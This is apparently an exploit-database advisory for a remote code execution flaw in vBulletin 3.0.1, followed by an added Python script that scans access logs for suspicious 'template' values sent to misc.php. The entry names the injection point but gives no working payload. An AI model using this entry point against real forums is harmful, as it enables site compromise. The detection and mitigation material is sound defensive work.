Vendor: vBulletin
By: str0ke
CVSS: 7.5 (HIGH)
Remote Code Execution
CWE: 94
Product Name: vBulletin
Affected Version From: vBulletin Version 3.0.1
Affected Version To: vBulletin Version 3.0.1
Patch Exists: NO
Related CWE: Unknown
CPE: a:vbulletin:vbulletin:3.0.1
Platforms Tested:
2005
vBulletin Version 3.0.1 RCE vulnerability
This exploit allows an attacker to execute arbitrary code on a vBulletin 3.0.1 website by injecting malicious code into the 'template' parameter of the 'misc.php?do=page' URL. The attacker can execute system commands or PHP functions using this vulnerability.
Mitigation:
Upgrade to a patched version of vBulletin or apply a security patch provided by the vendor. Additionally, restrict access to the 'misc.php' file and sanitize user input.
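Added example, not part of the original advisory or exploit: a log-triage script for the request described above, which flags `misc.php?do=page` requests whose `template` value is not a plain template name. The allowlist pattern for template names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: legitimate page-template names are short identifiers.
SAFE_TEMPLATE = re.compile(r"[A-Za-z0-9_]{1,64}")
# Request line inside a common/combined-format access-log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, harmless values).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2005:10:01:22 +0000] "GET /forum/misc.php?do=page&template=faq_rules HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/Mar/2005:10:02:05 +0000] "GET /forum/misc.php?do=page&template=a%20b%3Bc HTTP/1.1" 200 311',
    '198.51.100.7 - - [12/Mar/2005:10:02:40 +0000] "GET /forum/misc.php?do=whoposted&t=4 HTTP/1.1" 200 900',
    '203.0.113.9 - - [12/Mar/2005:10:03:11 +0000] "GET /forum/misc.php?do=page&template%5B%5D=x HTTP/1.1" 200 311',
]

def suspicious_template(url):
    """Return the decoded 'template' value when a misc.php?do=page request
    carries one outside the allowlist; return None otherwise."""
    parts = urlsplit(url)
    if not unquote(parts.path).lower().endswith("/misc.php"):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    if "page" not in query.get("do", []):
        return None
    for key, values in query.items():
        # PHP also accepts the array form template[]=..., which a plain
        # template name never needs, so that form is always flagged.
        is_array = key.startswith("template[")
        if key == "template" or is_array:
            for value in values:
                if is_array or not SAFE_TEMPLATE.fullmatch(value):
                    return value
    return None

def scan(lines):
    """Yield (client_ip, decoded_value) for each flagged log line."""
    for line in lines:
        match = REQUEST.search(line)
        if match:
            value = suspicious_template(match.group(1))
            if value is not None:
                yield line.split(" ", 1)[0], value

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent template={value!r}")
```

The same allowlist can serve as a request filter in front of `misc.php` while the installation is being upgraded.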